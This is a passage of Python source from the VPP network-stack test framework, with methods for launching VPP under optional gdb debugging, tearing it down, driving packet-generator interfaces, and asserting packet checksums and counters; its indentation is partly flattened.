              " -ex 'target remote localhost:{port}'"
              .format(port=cls.gdbserver_port))
        print("Now is the time to attach gdb by running the above "
              "command, set up breakpoints etc., then resume VPP from "
              "within gdb by issuing the 'continue' command")
        # bump the port so a parallel/next testcase gets a fresh one
        cls.gdbserver_port += 1
    elif cls.debug_gdb:
        print("sudo gdb " + cls.vpp_bin + " -ex 'attach %s'" % cls.vpp.pid)
        print("Now is the time to attach gdb by running the above "
              "command and set up breakpoints etc., then resume VPP from"
              " within gdb by issuing the 'continue' command")
    print(single_line_delim)
    input("Press ENTER to continue running the testcase...")
@classmethod
def run_vpp(cls):
    """Spawn the VPP subprocess (optionally under gdbserver).

    Stores the Popen object on cls.vpp; stdout/stderr are piped so
    pump_output can drain them.  Re-raises any spawn failure after
    logging it.
    """
    cmdline = cls.vpp_cmdline

    if cls.debug_gdbserver:
        gdbserver = '/usr/bin/gdbserver'
        if not os.path.isfile(gdbserver) or \
                not os.access(gdbserver, os.X_OK):
            raise Exception("gdbserver binary '%s' does not exist or is "
                            "not executable" % gdbserver)

        # wrap the VPP command line with gdbserver
        cmdline = [gdbserver, 'localhost:{port}'
                   .format(port=cls.gdbserver_port)] + cls.vpp_cmdline
        cls.logger.info("Gdbserver cmdline is %s", " ".join(cmdline))

    try:
        cls.vpp = subprocess.Popen(cmdline,
                                   stdout=subprocess.PIPE,
                                   stderr=subprocess.PIPE,
                                   bufsize=1)
    except subprocess.CalledProcessError as e:
        cls.logger.critical("Subprocess returned with non-0 return code: ("
                            "%s)", e.returncode)
        raise
    except OSError as e:
        cls.logger.critical("Subprocess returned with OS error: "
                            "(%s) %s", e.errno, e.strerror)
        raise
    except Exception as e:
        cls.logger.exception("Subprocess returned unexpected from "
                             "%s:", cmdline)
        raise

    # give the user a chance to attach a debugger before tests proceed
    cls.wait_for_enter()
@classmethod
def wait_for_stats_socket(cls):
    """Poll until the VPP stats socket appears (up to 300 s).

    In gdb/gdbserver debug modes the deadline is ignored so VPP can sit
    at a breakpoint indefinitely.  Logs critically on timeout but does
    not raise.
    """
    deadline = time.time() + 300
    ok = False
    while time.time() < deadline or \
            cls.debug_gdb or cls.debug_gdbserver:
        if os.path.exists(cls.stats_sock):
            ok = True
            break
        cls.sleep(0.8)
    if not ok:
        cls.logger.critical("Couldn't stat : {}".format(cls.stats_sock))
@classmethod
def wait_for_coredump(cls):
    """Wait (up to 60 s) for an in-progress coredump to finish growing.

    A core file whose size is stable across a 1 s interval is considered
    complete.  No-op when no core file exists.
    """
    corefile = cls.tempdir + "/core"
    if os.path.isfile(corefile):
        cls.logger.error("Waiting for coredump to complete: %s", corefile)
        curr_size = os.path.getsize(corefile)
        deadline = time.time() + 60
        ok = False
        while time.time() < deadline:
            cls.sleep(1)
            size = curr_size
            curr_size = os.path.getsize(corefile)
            # unchanged size over one interval => dump finished
            if size == curr_size:
                ok = True
                break
        if not ok:
            cls.logger.error("Timed out waiting for coredump to complete:"
                             " %s", corefile)
        else:
            cls.logger.error("Coredump complete: %s, size %d",
                             corefile, curr_size)
@classmethod
def setUpClass(cls):
    """
    Perform class setup before running the testcase
    Remove shared memory files, start vpp and connect the vpp-api
    """
    super(VppTestCase, cls).setUpClass()
    gc.collect()  # run garbage collection first
    cls.logger = get_logger(cls.__name__)
    # RND_SEED must be set by the test runner; seeding makes runs
    # reproducible
    seed = os.environ["RND_SEED"]
    random.seed(seed)
    if hasattr(cls, 'parallel_handler'):
        cls.logger.addHandler(cls.parallel_handler)
        cls.logger.propagate = False
    # per-testcase temp dir holds sockets, logs and VPP runtime files
    cls.tempdir = tempfile.mkdtemp(
        prefix='vpp-unittest-%s-' % cls.__name__)
    cls.stats_sock = "%s/stats.sock" % cls.tempdir
    cls.api_sock = "%s/api.sock" % cls.tempdir
    cls.file_handler = FileHandler("%s/log.txt" % cls.tempdir)
    cls.file_handler.setFormatter(
        Formatter(fmt='%(asctime)s,%(msecs)03d %(message)s',
                  datefmt="%H:%M:%S"))
    cls.file_handler.setLevel(DEBUG)
    cls.logger.addHandler(cls.file_handler)
    cls.logger.debug("--- setUpClass() for %s called ---" %
                     cls.__name__)
    cls.shm_prefix = os.path.basename(cls.tempdir)
    os.chdir(cls.tempdir)
    cls.logger.info("Temporary dir is %s, shm prefix is %s",
                    cls.tempdir, cls.shm_prefix)
    cls.logger.debug("Random seed is %s" % seed)
    cls.setUpConstants()
    cls.reset_packet_infos()
    cls._captures = []
    cls.verbose = 0
    cls.vpp_dead = False
    cls.registry = VppObjectRegistry()
    cls.vpp_startup_failed = False
    cls.reporter = KeepAliveReporter()
    # need to catch exceptions here because if we raise, then the cleanup
    # doesn't get called and we might end with a zombie vpp
    try:
        cls.run_vpp()
        cls.reporter.send_keep_alive(cls, 'setUpClass')
        VppTestResult.current_test_case_info = TestCaseInfo(
            cls.logger, cls.tempdir, cls.vpp.pid, cls.vpp_bin)
        cls.vpp_stdout_deque = deque()
        cls.vpp_stderr_deque = deque()
        # background thread drains VPP's stdout/stderr into the deques
        cls.pump_thread_stop_flag = Event()
        cls.pump_thread_wakeup_pipe = os.pipe()
        cls.pump_thread = Thread(target=pump_output, args=(cls,))
        cls.pump_thread.daemon = True
        cls.pump_thread.start()
        if cls.debug_gdb or cls.debug_gdbserver:
            # no read timeout while a human is driving a debugger
            read_timeout = 0
        else:
            read_timeout = 5
        cls.vapi = VppPapiProvider(cls.shm_prefix, cls.shm_prefix, cls,
                                   read_timeout)
        if cls.step:
            hook = hookmodule.StepHook(cls)
        else:
            hook = hookmodule.PollHook(cls)
        cls.vapi.register_hook(hook)
        cls.wait_for_stats_socket()
        cls.statistics = VPPStats(socketname=cls.stats_sock)
        try:
            hook.poll_vpp()
        except VppDiedError:
            cls.vpp_startup_failed = True
            cls.logger.critical(
                "VPP died shortly after startup, check the"
                " output to standard error for possible cause")
            raise
        try:
            cls.vapi.connect()
        except Exception:
            # best-effort disconnect before propagating the failure
            try:
                cls.vapi.disconnect()
            except Exception:
                pass
            if cls.debug_gdbserver:
                print(colorize("You're running VPP inside gdbserver but "
                               "VPP-API connection failed, did you forget "
                               "to 'continue' VPP from within gdb?", RED))
            raise
    except Exception as e:
        cls.logger.debug("Exception connecting to VPP: %s" % e)
        # ensure the spawned VPP is torn down before re-raising
        cls.quit()
        raise
@classmethod
def quit(cls):
    """
    Disconnect vpp-api, kill vpp and cleanup shared memory files

    Safe to call in any partially-initialised state: every step is
    guarded by hasattr() so quit() can run even when setUpClass failed
    part-way through.
    """
    if (cls.debug_gdbserver or cls.debug_gdb) and hasattr(cls, 'vpp'):
        cls.vpp.poll()
        if cls.vpp.returncode is None:
            # let the user finish their debug session before teardown
            print()
            print(double_line_delim)
            print("VPP or GDB server is still running")
            print(single_line_delim)
            input("When done debugging, press ENTER to kill the "
                  "process and finish running the testcase...")

    # first signal that we want to stop the pump thread, then wake it up
    if hasattr(cls, 'pump_thread_stop_flag'):
        cls.pump_thread_stop_flag.set()
    if hasattr(cls, 'pump_thread_wakeup_pipe'):
        os.write(cls.pump_thread_wakeup_pipe[1], b'ding dong wake up')
    if hasattr(cls, 'pump_thread'):
        cls.logger.debug("Waiting for pump thread to stop")
        cls.pump_thread.join()
    if hasattr(cls, 'vpp_stderr_reader_thread'):
        cls.logger.debug("Waiting for stdderr pump to stop")
        cls.vpp_stderr_reader_thread.join()

    if hasattr(cls, 'vpp'):
        if hasattr(cls, 'vapi'):
            cls.logger.debug("Disconnecting class vapi client on %s",
                             cls.__name__)
            cls.vapi.disconnect()
            cls.logger.debug("Deleting class vapi attribute on %s",
                             cls.__name__)
            del cls.vapi
        cls.vpp.poll()
        if cls.vpp.returncode is None:
            # still running: wait for any coredump, then terminate
            cls.wait_for_coredump()
            cls.logger.debug("Sending TERM to vpp")
            cls.vpp.terminate()
            cls.logger.debug("Waiting for vpp to die")
            cls.vpp.communicate()
        cls.logger.debug("Deleting class vpp attribute on %s",
                         cls.__name__)
        del cls.vpp

    # startup failure promotes stderr output to critical level
    if cls.vpp_startup_failed:
        stdout_log = cls.logger.info
        stderr_log = cls.logger.critical
    else:
        stdout_log = cls.logger.info
        stderr_log = cls.logger.info

    if hasattr(cls, 'vpp_stdout_deque'):
        stdout_log(single_line_delim)
        stdout_log('VPP output to stdout while running %s:', cls.__name__)
        stdout_log(single_line_delim)
        vpp_output = "".join(cls.vpp_stdout_deque)
        with open(cls.tempdir + '/vpp_stdout.txt', 'w') as f:
            f.write(vpp_output)
        stdout_log('\n%s', vpp_output)
        stdout_log(single_line_delim)

    if hasattr(cls, 'vpp_stderr_deque'):
        stderr_log(single_line_delim)
        stderr_log('VPP output to stderr while running %s:', cls.__name__)
        stderr_log(single_line_delim)
        vpp_output = "".join(cls.vpp_stderr_deque)
        with open(cls.tempdir + '/vpp_stderr.txt', 'w') as f:
            f.write(vpp_output)
        stderr_log('\n%s', vpp_output)
        stderr_log(single_line_delim)
@classmethod
def tearDownClass(cls):
    """ Perform final cleanup after running all tests in this test-case """
    cls.logger.debug("--- tearDownClass() for %s called ---" %
                     cls.__name__)
    cls.reporter.send_keep_alive(cls, 'tearDownClass')
    # quit() stops VPP and the stdout/stderr pump threads.
    cls.quit()
    cls.file_handler.close()
    # Drop accumulated packet-info state so the next test-case starts clean.
    cls.reset_packet_infos()
    if debug_framework:
        debug_internal.on_tear_down_class(cls)
def show_commands_at_teardown(self):
    """ Allow subclass specific teardown logging additions."""
    # Default implementation does nothing useful; subclasses override this
    # to dump their own "show ..." CLI output during tearDown().
    self.logger.info("--- No test specific show commands provided. ---")
def tearDown(self):
    """ Show various debug prints after each test """
    self.logger.debug("--- tearDown() for %s.%s(%s) called ---" %
                      (self.__class__.__name__, self._testMethodName,
                       self._testMethodDoc))
    try:
        if not self.vpp_dead:
            # Dump assorted VPP state for post-mortem debugging.
            self.logger.debug(self.vapi.cli("show trace max 1000"))
            self.logger.info(self.vapi.ppcli("show interface"))
            self.logger.info(self.vapi.ppcli("show hardware"))
            self.logger.info(self.statistics.set_errors_str())
            self.logger.info(self.vapi.ppcli("show run"))
            self.logger.info(self.vapi.ppcli("show log"))
            self.logger.info(self.vapi.ppcli("show bihash"))
            self.logger.info("Logging testcase specific show commands.")
            self.show_commands_at_teardown()
            self.registry.remove_vpp_config(self.logger)
            # Save/Dump VPP api trace log
            m = self._testMethodName
            api_trace = "vpp_api_trace.%s.%d.log" % (m, self.vpp.pid)
            # VPP writes the trace to /tmp; move it into the test tempdir.
            tmp_api_trace = "/tmp/%s" % api_trace
            vpp_api_trace_log = "%s/%s" % (self.tempdir, api_trace)
            self.logger.info(self.vapi.ppcli("api trace save %s" % api_trace))
            self.logger.info("Moving %s to %s\n" % (tmp_api_trace,
                                                    vpp_api_trace_log))
            os.rename(tmp_api_trace, vpp_api_trace_log)
            self.logger.info(self.vapi.ppcli("api trace custom-dump %s" %
                                             vpp_api_trace_log))
    except VppTransportShmemIOError:
        # VPP stopped responding over shared memory - mark it dead so the
        # remaining tests in this class fail fast instead of hanging.
        self.logger.debug("VppTransportShmemIOError: Vpp dead. "
                          "Cannot log show commands.")
        self.vpp_dead = True
    else:
        # Only unregister configs when the show commands all succeeded.
        self.registry.unregister_all(self.logger)
def setUp(self):
    """ Clear trace before running each test"""
    super(VppTestCase, self).setUp()
    self.reporter.send_keep_alive(self)
    if self.vpp_dead:
        # A previous test killed VPP; abort immediately.
        raise VppDiedError(rv=None, testcase=self.__class__.__name__,
                           method_name=self._testMethodName)
    self.sleep(.1, "during setUp")
    # Mark the test boundary in both captured output streams so the logs
    # can be attributed to individual tests.
    self.vpp_stdout_deque.append(
        "--- test setUp() for %s.%s(%s) starts here ---\n" %
        (self.__class__.__name__, self._testMethodName,
         self._testMethodDoc))
    self.vpp_stderr_deque.append(
        "--- test setUp() for %s.%s(%s) starts here ---\n" %
        (self.__class__.__name__, self._testMethodName,
         self._testMethodDoc))
    self.vapi.cli("clear trace")
    # store the test instance inside the test class - so that objects
    # holding the class can access instance methods (like assertEqual)
    type(self).test_instance = self
@classmethod
def pg_enable_capture(cls, interfaces=None):
    """
    Enable capture on packet-generator interfaces

    :param interfaces: iterable interface indexes (if None,
                       use self.pg_interfaces)
    """
    targets = cls.pg_interfaces if interfaces is None else interfaces
    for intf in targets:
        intf.enable_capture()
@classmethod
def register_capture(cls, cap_name):
    """ Register a capture in the testclass """
    # Remember the capture together with the moment it was registered;
    # pg_start() later deletes every registered capture.
    timestamp = time.time()
    cls._captures.append((timestamp, cap_name))
@classmethod
def get_vpp_time(cls):
    # "show clock" replies with a "Time now <float>" prefix; strip the
    # prefix and parse the remainder.
    reply = cls.vapi.cli('show clock')
    return float(reply.replace("Time now ", ""))
@classmethod
def sleep_on_vpp_time(cls, sec):
    """ Sleep according to time in VPP world

    :param sec: number of seconds to wait, measured on VPP's clock
    """
    # On a busy system with many processes
    # we might end up with VPP time being slower than real world
    # So take that into account when waiting for VPP to do something
    start_time = cls.get_vpp_time()
    while cls.get_vpp_time() - start_time < sec:
        cls.sleep(0.1)
@classmethod
def pg_start(cls):
    """ Enable the PG, wait till it is done, then clean up """
    cls.vapi.cli("trace add pg-input 1000")
    cls.vapi.cli('packet-generator enable')
    # PG, when starts, runs to completion -
    # so let's avoid a race condition,
    # and wait a little till it's done.
    # Then clean it up - and then be gone.
    deadline = time.time() + 300
    # "show packet-generator" contains "Yes" while a generator is running.
    while cls.vapi.cli('show packet-generator').find("Yes") != -1:
        cls.sleep(0.01)  # yield
        if time.time() > deadline:
            cls.logger.error("Timeout waiting for pg to stop")
            break
    # Delete every capture registered via register_capture().
    for stamp, cap_name in cls._captures:
        cls.vapi.cli('packet-generator delete %s' % cap_name)
    cls._captures = []
@classmethod
def create_pg_interfaces(cls, interfaces, gso=0, gso_size=0):
    """
    Create packet-generator interfaces.

    :param interfaces: iterable indexes of the interfaces.
    :returns: List of created interfaces.
    """
    created = []
    for index in interfaces:
        iface = VppPGInterface(cls, index, gso, gso_size)
        # Also expose the interface as a class attribute (e.g. cls.pg0).
        setattr(cls, iface.name, iface)
        created.append(iface)
    cls.pg_interfaces = created
    return created
@classmethod
def create_loopback_interfaces(cls, count):
    """
    Create loopback interfaces.

    :param count: number of interfaces created.
    :returns: List of created interfaces.
    """
    created = [VppLoInterface(cls) for _ in range(count)]
    for iface in created:
        # Expose each interface as a class attribute by its name.
        setattr(cls, iface.name, iface)
    cls.lo_interfaces = created
    return created
@classmethod
def create_bvi_interfaces(cls, count):
    """
    Create BVI interfaces.

    :param count: number of interfaces created.
    :returns: List of created interfaces.
    """
    created = [VppBviInterface(cls) for _ in range(count)]
    for iface in created:
        # Expose each interface as a class attribute by its name.
        setattr(cls, iface.name, iface)
    cls.bvi_interfaces = created
    return created
@staticmethod
def extend_packet(packet, size, padding=' '):
    """
    Extend packet to given size by padding with spaces or custom padding
    NOTE: Currently works only when Raw layer is present.

    :param packet: packet
    :param size: target size
    :param padding: padding used to extend the payload
    """
    # +4 bytes: presumably accounts for the Ethernet FCS added on the
    # wire - TODO confirm.
    packet_len = len(packet) + 4
    extend = size - packet_len
    if extend > 0:
        # Repeat the padding enough times to cover 'extend' bytes, then
        # trim to the exact length needed.
        num = (extend // len(padding)) + 1
        packet[Raw].load += (padding * num)[:extend].encode("ascii")
@classmethod
def reset_packet_infos(cls):
    """ Reset the list of packet info objects and packet counts to zero """
    cls._packet_infos = {}  # maps info.index -> _PacketInfo
    cls._packet_count_for_dst_if_idx = {}  # maps dst sw_if_index -> count
@classmethod
def create_packet_info(cls, src_if, dst_if):
    """
    Create packet info object containing the source and destination indexes
    and add it to the testcase's packet info list

    :param VppInterface src_if: source interface
    :param VppInterface dst_if: destination interface

    :returns: _PacketInfo object
    """
    info = _PacketInfo()
    info.index = len(cls._packet_infos)
    info.src = src_if.sw_if_index
    info.dst = dst_if.sw_if_index
    # Packets to a sub-interface are counted against its parent interface.
    if isinstance(dst_if, VppSubInterface):
        dst_idx = dst_if.parent.sw_if_index
    else:
        dst_idx = dst_if.sw_if_index
    seen = cls._packet_count_for_dst_if_idx.get(dst_idx, 0)
    cls._packet_count_for_dst_if_idx[dst_idx] = seen + 1
    cls._packet_infos[info.index] = info
    return info
@staticmethod
def info_to_payload(info):
"""
Convert _PacketInfo object to packet payload
:param info: _PacketInfo object
:returns: string containing serialized data from packet info
"""
return "%d %d %d %d %d" % (info.index, info.src, info.dst,
info.ip, info.proto)
@staticmethod
def payload_to_info(payload, payload_field='load'):
    """
    Convert packet payload to _PacketInfo object

    :param payload: packet payload
    :type payload:  <class 'scapy.packet.Raw'>
    :param payload_field: packet fieldname of payload "load" for
                          <class 'scapy.packet.Raw'>
    :type payload_field: str
    :returns: _PacketInfo object containing de-serialized data from payload
    """
    # The payload was produced by info_to_payload(): five integers
    # separated by whitespace (extra trailing tokens are ignored).
    tokens = getattr(payload, payload_field).split()
    info = _PacketInfo()
    (info.index, info.src, info.dst,
     info.ip, info.proto) = [int(t) for t in tokens[:5]]
    return info
def get_next_packet_info(self, info):
    """
    Iterate over the packet info list stored in the testcase
    Start iteration with first element if info is None
    Continue based on index in info if info is specified

    :param info: info or None
    :returns: next info in list or None if no more infos
    """
    # Pick the first entry when no starting point was given.
    nxt = 0 if info is None else info.index + 1
    if nxt == len(self._packet_infos):
        return None
    return self._packet_infos[nxt]
def get_next_packet_info_for_interface(self, src_index, info):
    """
    Search the packet info list for the next packet info with same source
    interface index

    :param src_index: source interface index to search for
    :param info: packet info - where to start the search
    :returns: packet info or None
    """
    candidate = self.get_next_packet_info(info)
    # Skip entries originating from other interfaces.
    while candidate is not None and candidate.src != src_index:
        candidate = self.get_next_packet_info(candidate)
    return candidate
def get_next_packet_info_for_interface2(self, src_index, dst_index, info):
    """
    Search the packet info list for the next packet info with same source
    and destination interface indexes

    :param src_index: source interface index to search for
    :param dst_index: destination interface index to search for
    :param info: packet info - where to start the search
    :returns: packet info or None
    """
    candidate = self.get_next_packet_info_for_interface(src_index, info)
    # Keep searching until the destination also matches (or we run out).
    while candidate is not None and candidate.dst != dst_index:
        candidate = self.get_next_packet_info_for_interface(src_index,
                                                            candidate)
    return candidate
def assert_equal(self, real_value, expected_value, name_or_class=None):
    """assertEqual with a descriptive message derived from name_or_class.

    :param name_or_class: either a plain name, or a callable (e.g. an
        enum-like class) used to render both values symbolically.
    """
    if name_or_class is None:
        self.assertEqual(real_value, expected_value)
        return
    try:
        # Try rendering both values through name_or_class; fall back to a
        # plain message if that fails for any reason.
        msg = "Invalid %s: %d('%s') does not match expected value %d('%s')"
        msg = msg % (getdoc(name_or_class).strip(),
                     real_value, str(name_or_class(real_value)),
                     expected_value, str(name_or_class(expected_value)))
    except Exception:
        msg = "Invalid %s: %s does not match expected value %s" % (
            name_or_class, real_value, expected_value)
    self.assertEqual(real_value, expected_value, msg)
def assert_in_range(self, real_value, expected_min, expected_max, name=None):
    """Assert expected_min <= real_value <= expected_max (inclusive)."""
    msg = None
    if name is not None:
        msg = "Invalid %s: %s out of range <%s,%s>" % (
            name, real_value, expected_min, expected_max)
    self.assertTrue(expected_min <= real_value <= expected_max, msg)
def assert_packet_checksums_valid(self, packet,
                                  ignore_zero_udp_checksums=True):
    """Verify every checksum field in the packet by recomputation.

    Re-dissects the packet, deletes all checksum fields, lets scapy
    recompute them on rebuild, then compares recomputed values against
    the originally received ones.

    :param packet: scapy packet to verify
    :param ignore_zero_udp_checksums: skip UDP checksums equal to 0
        (0 means "no checksum" for UDP over IPv4)
    """
    # Re-dissect to get a pristine copy of the received packet.
    received = packet.__class__(scapy.compat.raw(packet))
    udp_layers = ['UDP', 'UDPerror']
    checksum_fields = ['cksum', 'chksum']
    checksums = []
    counter = 0
    temp = received.__class__(scapy.compat.raw(received))
    # Walk all layers, deleting each checksum field so scapy recomputes
    # it on rebuild; remember (layer index, field name) pairs.
    while True:
        layer = temp.getlayer(counter)
        if layer:
            for cf in checksum_fields:
                if hasattr(layer, cf):
                    if ignore_zero_udp_checksums and \
                            0 == getattr(layer, cf) and \
                            layer.name in udp_layers:
                        continue
                    delattr(layer, cf)
                    checksums.append((counter, cf))
        else:
            break
        counter = counter + 1
    if 0 == len(checksums):
        return
    # Rebuild: scapy fills in the deleted checksum fields.
    temp = temp.__class__(scapy.compat.raw(temp))
    for layer, cf in checksums:
        calc_sum = getattr(temp[layer], cf)
        self.assert_equal(
            getattr(received[layer], cf), calc_sum,
            "packet checksum on layer #%d: %s" % (layer, temp[layer].name))
        self.logger.debug(
            "Checksum field `%s` on `%s` layer has correct value `%s`" %
            (cf, temp[layer].name, calc_sum))
def assert_checksum_valid(self, received_packet, layer,
                          field_name='chksum',
                          ignore_zero_checksum=False):
    """ Check checksum of received packet on given layer """
    received_packet_checksum = getattr(received_packet[layer], field_name)
    if ignore_zero_checksum and 0 == received_packet_checksum:
        # 0 means "checksum not present" (e.g. UDP over IPv4).
        return
    # Delete the field and rebuild so scapy recomputes the checksum,
    # then compare against the received value.
    recalculated = received_packet.__class__(
        scapy.compat.raw(received_packet))
    delattr(recalculated[layer], field_name)
    recalculated = recalculated.__class__(scapy.compat.raw(recalculated))
    self.assert_equal(received_packet_checksum,
                      getattr(recalculated[layer], field_name),
                      "packet checksum on layer: %s" % layer)
def assert_ip_checksum_valid(self, received_packet,
                             ignore_zero_checksum=False):
    """Verify the IPv4 header checksum of received_packet."""
    self.assert_checksum_valid(received_packet, 'IP',
                               ignore_zero_checksum=ignore_zero_checksum)
def assert_tcp_checksum_valid(self, received_packet,
                              ignore_zero_checksum=False):
    """Verify the TCP checksum of received_packet."""
    self.assert_checksum_valid(received_packet, 'TCP',
                               ignore_zero_checksum=ignore_zero_checksum)
def assert_udp_checksum_valid(self, received_packet,
                              ignore_zero_checksum=True):
    """Verify the UDP checksum; 0 is ignored by default (no checksum)."""
    self.assert_checksum_valid(received_packet, 'UDP',
                               ignore_zero_checksum=ignore_zero_checksum)
def assert_embedded_icmp_checksum_valid(self, received_packet):
    """Verify checksums of the original packet embedded in an ICMP error."""
    if received_packet.haslayer(IPerror):
        self.assert_checksum_valid(received_packet, 'IPerror')
    if received_packet.haslayer(TCPerror):
        self.assert_checksum_valid(received_packet, 'TCPerror')
    if received_packet.haslayer(UDPerror):
        self.assert_checksum_valid(received_packet, 'UDPerror',
                                   ignore_zero_checksum=True)
    if received_packet.haslayer(ICMPerror):
        self.assert_checksum_valid(received_packet, 'ICMPerror')
def assert_icmp_checksum_valid(self, received_packet):
    """Verify the ICMP checksum and any embedded original packet's sums."""
    self.assert_checksum_valid(received_packet, 'ICMP')
    self.assert_embedded_icmp_checksum_valid(received_packet)
def assert_icmpv6_checksum_valid(self, pkt):
    """Verify ICMPv6 checksums for DestUnreach / EchoRequest / EchoReply."""
    if pkt.haslayer(ICMPv6DestUnreach):
        self.assert_checksum_valid(pkt, 'ICMPv6DestUnreach', 'cksum')
        self.assert_embedded_icmp_checksum_valid(pkt)
    if pkt.haslayer(ICMPv6EchoRequest):
        self.assert_checksum_valid(pkt, 'ICMPv6EchoRequest', 'cksum')
    if pkt.haslayer(ICMPv6EchoReply):
        self.assert_checksum_valid(pkt, 'ICMPv6EchoReply', 'cksum')
def get_packet_counter(self, counter):
    """Return the value of a packet counter.

    :param counter: either a stats-segment path (starting with '/'),
        queried directly, or an error counter name matched against the
        "sh errors" CLI output.
    :returns: the counter value (0 when the name is not found in the
        CLI output).
    """
    if counter.startswith("/"):
        counter_value = self.statistics.get_counter(counter)
    else:
        counters = self.vapi.cli("sh errors").split('\n')
        counter_value = 0
        # Skip the header line and the trailing line of the CLI output.
        for i in range(1, len(counters) - 1):
            results = counters[i].split()
            # Guard against blank/short lines, which previously raised
            # IndexError on results[1].
            if len(results) >= 2 and results[1] == counter:
                counter_value = int(results[0])
                break
    return counter_value
def assert_packet_counter_equal(self, counter, expected_value):
    """Assert that the given packet counter has the expected value."""
    counter_value = self.get_packet_counter(counter)
    self.assert_equal(counter_value, expected_value,
                      "packet counter `%s'" % counter)
def assert_error_counter_equal(self, counter, expected_value):
    """Assert that the given error counter has the expected value."""
    counter_value = self.statistics.get_err_counter(counter)
    self.assert_equal(counter_value, expected_value,
                      "error counter `%s'" % counter)
@classmethod
def sleep(cls, timeout, remark=None):
    """Sleep for timeout seconds, logging if the sleep badly overshoots.

    :param timeout: seconds to sleep; 0 only yields the CPU quantum.
    :param remark: optional text included in the log messages.
    """
    # /* Allow sleep(0) to maintain win32 semantics, and as decreed
    #  * by Guido, only the main thread can be interrupted.
    # */
    # https://github.com/python/cpython/blob/6673decfa0fb078f60587f5cb5e98460eea137c2/Modules/timemodule.c#L1892  # noqa
    if timeout == 0:
        # yield quantum
        if hasattr(os, 'sched_yield'):
            os.sched_yield()
        else:
            time.sleep(0)
        return
    # hasattr checks: this may be called before the class logger exists.
    if hasattr(cls, 'logger'):
        cls.logger.debug("Starting sleep for %es (%s)", timeout, remark)
    before = time.time()
    time.sleep(timeout)
    after = time.time()
    # Warn when we slept more than twice as long as requested - usually a
    # sign of an overloaded test host.
    if hasattr(cls, 'logger') and after - before > 2 * timeout:
        cls.logger.error("unexpected self.sleep() result - "
                         "slept for %es instead of ~%es!",
                         after - before, timeout)
    if hasattr(cls, 'logger'):
        cls.logger.debug(
            "Finished sleep (%s) - slept %es (wanted %es)",
            remark, after - before, timeout)
def pg_send(self, intf, pkts):
    """Clear trace, queue pkts on intf, enable capture and start the PG."""
    self.vapi.cli("clear trace")
    intf.add_stream(pkts)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
def send_and_assert_no_replies(self, intf, pkts, remark="", timeout=None):
    """Send pkts on intf and assert nothing is captured on any pg interface."""
    self.pg_send(intf, pkts)
    # NOTE(review): falsy check means an explicit timeout=0 is also
    # replaced by 1 - presumably intentional; confirm before relying on 0.
    if not timeout:
        timeout = 1
    for i in self.pg_interfaces:
        i.get_capture(0, timeout=timeout)
        i.assert_nothing_captured(remark=remark)
        # After the first interface has waited the full timeout, a short
        # poll suffices for the remaining ones.
        timeout = 0.1
def send_and_expect(self, intf, pkts, output, n_rx=None):
    """Send pkts on intf and return the capture of n_rx packets on output.

    :param n_rx: expected number of received packets; defaults to len(pkts).
    """
    expected = n_rx if n_rx else len(pkts)
    self.pg_send(intf, pkts)
    return output.get_capture(expected)
def send_and_expect_only(self, intf, pkts, output, timeout=None):
    """Send pkts on intf; expect them ONLY on output, nothing elsewhere."""
    self.pg_send(intf, pkts)
    rx = output.get_capture(len(pkts))
    outputs = [output]
    if not timeout:
        timeout = 1
    # Every other pg interface must capture nothing.
    for i in self.pg_interfaces:
        if i not in outputs:
            i.get_capture(0, timeout=timeout)
            i.assert_nothing_captured()
            # First interface waits the full timeout; the rest poll briefly.
            timeout = 0.1
    return rx
def runTest(self):
    """ unittest calls runTest when TestCase is instantiated without a
    test case.  Use case: Writing unittests against VppTestCase"""
    # Intentionally empty - presence alone satisfies unittest.
    pass
def get_testcase_doc_name(test):
    """Return the first line of the docstring of the test's class."""
    class_doc = getdoc(test.__class__)
    return class_doc.splitlines()[0]
def get_test_description(descriptions, test):
    """Return the short description when enabled and present, else str(test)."""
    short_description = test.shortDescription()
    use_short = descriptions and short_description
    return short_description if use_short else str(test)
class TestCaseInfo(object):
    """Holds per-test-case artifacts used for failure/core-dump reporting."""

    def __init__(self, logger, tempdir, vpp_pid, vpp_bin_path):
        self.logger = logger
        self.tempdir = tempdir
        self.vpp_pid = vpp_pid
        self.vpp_bin_path = vpp_bin_path
        # Name of the test during which a core file appeared, if any.
        self.core_crash_test = None
class VppTestResult(unittest.TestResult):
    """
    @property result_string
     String variable to store the test case result string.
    @property errors
     List variable containing 2-tuples of TestCase instances and strings
     holding formatted tracebacks. Each tuple represents a test which
     raised an unexpected exception.
    @property failures
     List variable containing 2-tuples of TestCase instances and strings
     holding formatted tracebacks. Each tuple represents a test where
     a failure was explicitly signalled using the TestCase.assert*()
     methods.
    """

    # Class-level state shared across all result instances in a run.
    failed_test_cases_info = set()
    core_crash_test_cases_info = set()
    current_test_case_info = None

    def __init__(self, stream=None, descriptions=None, verbosity=None,
                 runner=None):
        """
        :param stream File descriptor to store where to report test results.
            Set to the standard error stream by default.
        :param descriptions Boolean variable to store information if to use
            test case descriptions.
        :param verbosity Integer variable to store required verbosity level.
        """
        super(VppTestResult, self).__init__(stream, descriptions, verbosity)
        self.stream = stream
        self.descriptions = descriptions
        self.verbosity = verbosity
        self.result_string = None
        self.runner = runner

    def addSuccess(self, test):
        """
        Record a test succeeded result

        :param test:
        """
        if self.current_test_case_info:
            self.current_test_case_info.logger.debug(
                "--- addSuccess() %s.%s(%s) called" % (test.__class__.__name__,
                                                       test._testMethodName,
                                                       test._testMethodDoc))
        unittest.TestResult.addSuccess(self, test)
        self.result_string = colorize("OK", GREEN)
        self.send_result_through_pipe(test, PASS)

    def addSkip(self, test, reason):
        """
        Record a test skipped.

        :param test:
        :param reason:
        """
        if self.current_test_case_info:
            self.current_test_case_info.logger.debug(
                "--- addSkip() %s.%s(%s) called, reason is %s" %
                (test.__class__.__name__, test._testMethodName,
                 test._testMethodDoc, reason))
        unittest.TestResult.addSkip(self, test, reason)
        self.result_string = colorize("SKIP", YELLOW)
        self.send_result_through_pipe(test, SKIP)

    def symlink_failed(self):
        """Create a '<tempdir>-FAILED' symlink under $FAILED_DIR.

        Best-effort: any exception is logged and swallowed.
        """
        if self.current_test_case_info:
            try:
                failed_dir = os.getenv('FAILED_DIR')
                link_path = os.path.join(
                    failed_dir,
                    '%s-FAILED' %
                    os.path.basename(self.current_test_case_info.tempdir))
                if self.current_test_case_info.logger:
                    self.current_test_case_info.logger.debug(
                        "creating a link to the failed test")
                    self.current_test_case_info.logger.debug(
                        "os.symlink(%s, %s)" %
                        (self.current_test_case_info.tempdir, link_path))
                if os.path.exists(link_path):
